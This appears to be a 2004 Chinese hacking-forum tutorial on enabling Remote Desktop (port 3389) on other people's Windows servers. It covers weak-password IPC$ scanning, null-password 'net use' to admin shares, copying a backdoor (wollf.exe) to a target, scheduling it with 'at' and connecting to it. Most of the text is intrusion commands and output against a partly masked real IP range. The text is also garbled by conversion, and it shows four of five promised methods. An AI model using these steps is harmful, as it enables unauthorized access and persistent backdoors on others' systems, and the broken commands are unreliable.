打開3389終端的五種方法!!(推薦)
(2004-06-05 17:41)
第壹種方法:
==========================================================================================
使用的工具:
1:ipcscan掃描儀
2.終端服務連接工具xpts.exe(帶拷貝文件補丁的WIN 2000/XP終端連接程序。格式化IPort)
3.終端腳本rots.vbs(灰軌zzzevazzz作品)
4:cscript(在system32文件夾下;98操作系統可能沒有。
第二步:
1:用ipcscan掃描弱密碼(可以自己掃描,我也掃描壹些弱密碼主機。演出真實的時候我會發布在論壇上)。
2.用rots.vbs啟動終端服務。
解釋cscriptrots.vbs & lt密碼>[服務端口][自動重啟選項]
格式cscript.exe rots.vbsipuseruserpassport/r
或者cscript.exe·rots.vbsipuseruserpassport/fr.
三:常見問題:
1:腳本會判斷目標系統類型。如果不是server以上,會提示是否取消。因為pro版不能安裝終端服務。如果您確定腳本是錯誤的,請繼續安裝。
2.似乎是:連接202.202.202.202...錯誤0x80070776。錯誤描述:找不到該對象的指定導出器。我們放棄吧。
3:可能連不上。請使用這種格式。127 . 0 . 0 . 1:18181818是剛開通的端口。
==========================================================================================
第二種方法:
==========================================================================================
進入後:TELNET up!
c:\ & gt;echo[組件]& gt;c:\rock
c:\ & gt;echo TSEnable = on & gt& gtc:\rock
c:\ & gt;sysoc mgr/I:c:\ win nt \ INF \ sysoc . INF/u:c:\ rock/q
或者!
c:\ & gt;echo[組件]& gt;d:\娃娃
c:\ & gt;echo TSEnable = on & gt& gtd:\娃娃
c:\ & gt;sysoc mgr/I:c:\ win nt \ INF \ sysoc . INF/u:d:\ wawa/q
以後自動啟動了就OK了。
或者:
用創建壹個批處理文件。bat後綴(任意文件名)通過使用DOS命令edit > c:\sql在本地回顯[components]
echo TSEnable = on & gt& gt
c:\ sqlsysocmgr/I:c:\ win nt \ INF \ sysoc . INF/u:c:\ SQL/q
Net使用\\ip地址\ipc$密碼/用戶:用戶名(壹般默認:管理員)。
使用at time獲取另壹臺服務器的時間。
復制路徑:\xxx.bat \\ip地址\$c:\winnt
在時間00:00:00 xxx.bat
服務器執行完命令後,服務器會重啟,用3389登錄就可以了!
==========================================================================================
第三種方法:
==========================================================================================
進入後,檢查是否再次安裝了終端組件:
c:\ & gt;查詢用戶
該工具需要安裝終端服務。
這進壹步確認了組件沒有被安裝。如果妳回來了:
用戶名會話名稱ID狀態空閑時間登錄時間
& gtW1控制臺0正在運行。2002-1-12 22: 5
\ \像這樣的信息,可能是組件已經安裝好了。
好吧!壹切正常,妳可以開始安裝了。
-
c:\ & gt;Dir c:\sysoc.inf /s //檢查inf文件的位置。
C:\WINNT\inf目錄
2000年20時00分
1個文件,3770字節
-
c:\ & gt;目錄c:\sysocmgr。* /s //檢查組件安裝程序。
目錄為c:\WINNT\system32
sysocmgr.exe 42,768號
1文件42,768字節
-
c:\ & gt;echo[組件]& gt;c:\rock
c:\ & gt;echo TSEnable = on & gt& gtc:\rock
//這是設置無人參與安裝的參數。
c:\ & gt;類型c:\rock
[組件]
TSEnable =開
//檢查參數文件
-
c:\ & gt;sysoc mgr/I:c:\ win nt \ INF \ sysoc . INF/u:c:\ rock/q
-
這是實際安裝組件的命令。
以上命令不添加/R參數,安裝後主機會自動重啟。
如果添加了/R參數,主機將不會重新啟動。
如果壹切順利,另壹臺主機將在幾分鐘內離線,當它回來時,
3389終端服務已經啟動。妳可以把它連接起來。
問題和建議:
a在安裝過程中,妳不使用/R,有時主機不會重啟,所以妳必須手動重啟,但當使用命令如:iisreset /reboot時,對方
屏幕上會出現壹個對話框,寫著是誰導致了啟動,以及重啟前多少秒。
b如果壹次做不到,可以再試壹次,在實踐中很有用。
c輸入sysocmgr命令開始安裝時,壹定不要輸入錯誤的命令參數,這樣會在另壹邊彈出壹個很大的對話框,借助sysocmgr非常顯眼。
並要求確認。妳的屏幕上不會有任何反應,妳也不會知道有錯誤,所以會有b的建議。
==========================================================================================
第四種方法:
==========================================================================================
c:\文檔和設置\盧杉。XZGJDOMAIN & gt凈用\\218.22.155。*\ipc$ "" /us
誒:管理員-連接成功!
命令成功完成。
c:\文檔和設置\盧杉。XZGJDOMAIN & gt復制wollf.exe \ \ 218 . 22 . 155。*\admi
N $ -將admin$目錄從wollf.exe復制到目標計算機。
已復制1個文件。
c:\文檔和設置\盧杉。XZGJDOMAIN & gt復制hbulot.exe \ \ 218 . 22 . 155。*\adm
在$ -將admin$目錄從hbulot.exe復制到目標計算機。
已復制1個文件。
c:\文檔和設置\盧杉。XZGJDOMAIN & gt凈時間\\218.22.155。*
\\218.22.155.*當前時間是上午2002/12/16:37
命令成功完成。
c:\文檔和設置\盧杉。XZGJDOMAIN & gtat \\218.22.155。* 06:39 wollf.exe
作業ID = 1的added-wollf.exe新作業被指定在06:39運行。
-
描述:
Wollf.exe是壹個後門程序。很多專家喜歡nc或者winshell,但是我對他情有獨鐘!這裏我只介紹和這篇文章的關系。
讓相關命令參數,其高級用法不做補充。
Hbulot.exe用於啟動3389服務。如果不是server或以上版本,就不要運行。因為pro版不能安裝終端服務。
兩分鐘後。......
-
c:\文檔和設置\盧杉。XZGJDOMAIN & gtwollf-連接218.22.155。* 7614
“Wollf遠程管理器”v1.6
代碼由wollf,/soft/show.asp?id=22
參考資料:
http://BBS . 77169 . org/read . PHP?fid=100。tid=68170。toread=1